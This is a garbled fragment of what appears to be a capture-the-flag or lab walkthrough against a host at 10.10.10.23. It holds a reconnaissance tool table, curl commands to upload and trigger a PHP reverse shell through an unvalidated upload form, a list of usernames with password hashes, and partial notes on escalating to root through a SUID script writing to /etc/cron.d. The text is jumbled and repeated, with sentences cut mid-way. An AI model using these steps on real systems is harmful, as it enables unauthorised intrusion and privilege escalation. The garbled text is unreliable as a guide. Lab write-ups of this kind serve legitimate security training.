Enzai__x Portable -

curl http://10.10.10.23/uploads/shell.php

Since `upload.php` does **no validation**, we can upload a **PHP reverse shell**. enzai__x

# 2️⃣ POST it curl -F "file=@shell.php" http://10.10.10.23/upload.php curl http://10

carlos:5f4dcc3b5aa765d61d8327deb882cf99 guest:81dc9bdb52d04dc20036dbd8313ed055 `` | | dnsrecon (if a hostname is given) | dnsrecon -d target

| Tool | Command | Why | |------|----------|-----| | | nmap -sC -sV -p‑- 10.10.10.23 | Runs default scripts, grabs service versions, and scans all ports. | | masscan (optional) | masscan 10.10.10.23 -p1-65535 --rate=5000 -oG masscan.txt | Very fast “full‑port” sweep if the target is on a large network. | | dnsrecon (if a hostname is given) | dnsrecon -d target.com -t brt | Looks for sub‑domains that might host the vulnerable service. | | httprobe / httpx | httpx -l hosts.txt -status-code -title | Quickly validates which discovered hosts actually serve HTTP. |

Inside it lives a owned by root :

Because we have SUID backup.sh , we can write to /etc/cron.d/ :